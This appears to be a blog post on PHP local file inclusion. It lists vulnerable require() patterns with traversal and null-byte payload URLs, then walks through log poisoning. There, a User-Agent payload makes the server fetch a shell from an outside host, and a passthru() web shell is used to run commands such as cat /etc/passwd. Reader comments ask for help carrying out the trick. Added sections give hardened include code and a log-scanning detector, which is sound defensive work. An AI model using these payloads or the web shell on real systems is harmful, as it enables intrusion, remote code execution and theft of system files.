Insecure PHP Functions And Their Exploits…

May 27, 2010 at 9:14 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

Here are various PHP include patterns and the ways they get abused. In each case a value the attacker controls ends up in require(), so the attacker chooses which file is read (and, if it contains PHP, executed):

require($filename);
http://localhost/?filename=/etc/passwd

require("stuff/".$filename);
http://localhost/?filename=/../../../../../etc/passwd

require("stuff/".$filename.".php");
http://localhost/?filename=/../../../../../etc/passwd%00

require("stuff/".$_COOKIE['something'].".php");
javascript:document.cookie = "something=../../../../../etc/passwd%00";

In the first form the attacker controls the whole path; with allow_url_include switched on it is a remote file inclusion as well. A fixed prefix ("stuff/") is no protection because ../ walks straight back out of it, and a fixed suffix (".php") only holds until a %00 is appended: PHP before 5.3.4 hands the string to the C library, which stops at the NUL byte and so drops the suffix. From 5.3.4 onwards include() refuses paths containing a NUL byte, so that particular bypass no longer works. The cookie example shows that where the tainted string comes from (GET, POST, cookie, header) makes no difference.
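As an added example (mine, not code from the original post), here is the third pattern above next to two hardened versions: an allowlist, and a confined dynamic include. The "stuff/" directory, the page names and the "page" query parameter are assumptions for the illustration; it needs PHP 7 or later.

```php
<?php
// Added example, not code from the original post: the vulnerable pattern
// from the list above next to two hardened versions. The "stuff/" directory,
// the page names and the "page" query parameter are assumed for illustration.
// Requires PHP 7 or later.

// VULNERABLE: equivalent to require("stuff/".$filename.".php") above. The
// prefix is defeated by ../ and, on PHP < 5.3.4, the suffix by a %00.
function include_vulnerable(string $filename): void
{
    require 'stuff/' . $filename . '.php';
}

// HARDENED, option 1: an allowlist. The request carries a key, never a path,
// and the key is looked up in a map the application controls.
const PAGES = [
    'home'    => 'stuff/home.php',
    'about'   => 'stuff/about.php',
    'contact' => 'stuff/contact.php',
];

function include_allowlisted(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        exit('unknown page');
    }
    require PAGES[$page];
}

// HARDENED, option 2: when the set of files really is dynamic, confine the
// resolved path to one directory. The character allowlist rejects "/", "."
// and NUL before any filesystem call; realpath() then collapses any remaining
// ".." and follows symlinks, so the prefix check is made on the canonical path.
function include_confined(string $filename): void
{
    if (!preg_match('/\A[a-z0-9_-]+\z/', $filename)) {
        http_response_code(400);
        exit('bad page name');
    }
    $base = realpath(__DIR__ . '/stuff');
    if ($base === false) {
        http_response_code(500);
        exit('page directory missing');
    }
    $target = realpath($base . '/' . $filename . '.php');
    if ($target === false || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        exit('unknown page');
    }
    require $target;
}

include_allowlisted($_GET['page'] ?? 'home');
```

The allowlist is the version to prefer whenever the set of includable files is known up front; the confined version is for the rare case where it genuinely is not, and even there the character check does most of the work, with the realpath() prefix comparison catching symlinks that point out of the directory.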

A neat trick for getting code onto the box through one of these LFI bugs is to poison the web server's log files (access_log / error_log). The easiest way I found is the Live HTTP Headers Firefox plug-in: load the vulnerable page, capture the request, and replace the User-Agent string with PHP code of your choice. The web server writes the User-Agent into the access log, and when you then include the log file through the LFI, PHP parses the whole file and executes whatever sits between PHP tags. Look at these headers for instance:

Host: localhost
User-Agent: <?php system('GET http://www.example.com/phpshell/shell.txt > shell.php'); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

Replaying the request with Live HTTP Headers adds a line like this to access_log (a single line in the real file):

127.0.0.1 - - [27/May/2010:21:30:17 +0100] "GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 855 "-" "<?php system('GET http://www.example.com/phpshell/shell.txt > shell.php'); ?>"

Apache only escapes quotes and control characters in the User-Agent, so the PHP tags survive intact. When you now include the log file through the LFI (its path has to be guessable and it has to be readable by the web server user), PHP executes the code: GET is the lwp-request command from libwww-perl, which has to be installed on the target, and it fetches shell.txt from your server and writes it to shell.php in the current directory of the web server process, normally the directory of the included script, which therefore has to be writable by that user. You can then browse to shell.php :-)

So, say shell.txt (and therefore shell.php) contains the following one-liner (full <?php tag so it does not depend on short_open_tag, and a quoted index so PHP does not have to guess at a constant called pwn):

<?php passthru($_GET['pwn']); ?>

Now we have that piece of code on our victim which we can navigate to through the following URL:

http://localhost/shell.php

To take advantage of this simple PHP shell, all we have to do is pass the command in the pwn parameter:

http://localhost/shell.php?pwn=cat%20/etc/passwd

http://localhost/shell.php?pwn=uname%20-a

http://localhost/shell.php?pwn=who

http://localhost/shell.php?pwn=ps%20afuuwx

Then the command output will be displayed on the page :-)

A quick note:

%00 is a URL-encoded NUL byte (it truncates the include path on PHP before 5.3.4)
%20 is a URL-encoded SPACE
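Looking at the same attack from the defender's side, here is an added example (mine, not from the original post) that parses Apache combined-format access log lines and flags the stages of the log-poisoning attack described above: ../ and %00 in the request, reads of sensitive files or of the log itself, and PHP tags in the User-Agent or Referer. The log lines are constructed for the example; the script runs under the PHP CLI.

```php
<?php
// Added example, not code from the original post: scan Apache combined-format
// access log lines for the LFI / log-poisoning attack described above.
// The log lines below are constructed for this example.

const SAMPLE_LOG = <<<'LOG'
127.0.0.1 - - [27/May/2010:21:30:17 +0100] "GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 855 "-" "<?php system('GET http://www.example.com/phpshell/shell.txt > shell.php'); ?>"
127.0.0.1 - - [27/May/2010:21:31:02 +0100] "GET /testing/vuln.php?COLOR=../../../../../../../../../../var/log/apache2/access_log%00 HTTP/1.1" 200 20481 "-" "Mozilla/5.0"
127.0.0.1 - - [27/May/2010:21:32:40 +0100] "GET /testing/shell.php?pwn=uname%20-a HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.5 - - [27/May/2010:21:33:00 +0100] "GET /testing/vuln.php?COLOR=blue HTTP/1.1" 200 855 "-" "Mozilla/5.0"
LOG;

// Combined log format: client ident user [time] "request" status bytes "referer" "user-agent".
// Apache escapes embedded quotes as \" so the last two fields allow backslash escapes.
const COMBINED_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "((?:[^"\\\\]|\\\\.)*)" "((?:[^"\\\\]|\\\\.)*)"$/';

function parse_combined(string $line): ?array
{
    if (!preg_match(COMBINED_RE, $line, $m)) {
        return null;
    }
    return [
        'client'  => $m[1], 'time'   => $m[2], 'request' => $m[3],
        'status'  => (int) $m[4], 'bytes' => $m[5],
        'referer' => $m[6], 'ua'     => $m[7],
    ];
}

// Indicators are checked on the URL-decoded request as well as the raw one,
// because the attacker chooses the encoding.
function lfi_indicators(array $entry): array
{
    $hits    = [];
    $raw     = $entry['request'];
    $decoded = rawurldecode($raw);

    if (preg_match('#(?:\.\./){2,}#', $decoded)) {
        $hits[] = 'traversal';
    }
    if (strpos($raw, '%00') !== false || strpos($decoded, "\0") !== false) {
        $hits[] = 'null-byte';
    }
    if (preg_match('#/(?:etc/passwd|proc/self/environ|var/log/)#', $decoded)) {
        $hits[] = 'sensitive-file';
    }
    // PHP tags in a client-supplied header field that ends up in the log.
    foreach (['ua', 'referer'] as $field) {
        if (preg_match('/<\?(?:php\b|=)|<\?\s/i', $entry[$field])) {
            $hits[] = "php-tag-in-$field";
        }
    }
    return $hits;
}

function scan_log(string $log): array
{
    $alerts = [];
    foreach (preg_split('/\R/', trim($log)) as $n => $line) {
        $entry = parse_combined($line);
        if ($entry === null) {
            $alerts[] = ['line' => $n + 1, 'client' => '-', 'indicators' => ['unparsable']];
            continue;
        }
        $indicators = lfi_indicators($entry);
        if ($indicators) {
            $alerts[] = ['line' => $n + 1, 'client' => $entry['client'], 'indicators' => $indicators];
        }
    }
    return $alerts;
}

foreach (scan_log(SAMPLE_LOG) as $alert) {
    printf("line %d client %s: %s\n", $alert['line'], $alert['client'], implode(', ', $alert['indicators']));
}
```

The first two constructed lines (the poisoning request and the include of the log itself) are flagged; the third, the request to the dropped shell, trips none of these indicators on its own. On a real incident you would pivot from the flagged client address to everything else it requested, which is where the shell shows up.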

Until the next time…

2 Comments

  1. pearl said,

    I wonder if a silly noob can ask for your help..
    if not I hope it’s not rude to have tried :)

    I’ve tried to use your excellent tip for poisoning log files
    first thing, in this line:
    User-Agent:
    does “example.com” refer to where I host a shell to remotely include? I think so, but I want to make sure

    Then I absolutely didn’t get the relevance to the next step:
    "GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1"
    200 855 "-" ""
    the first line is a lfi, I understand. but where does the “” come from? or where do I have to enter it?

    btw I was using HAS to manipulate headers

    Thank you

  2. pearl said,

    sorry, the piece of code is being removed, I guess,

    php system(‘GET.php’); ?
    (where it was posted as
    200 855 “-” “”)
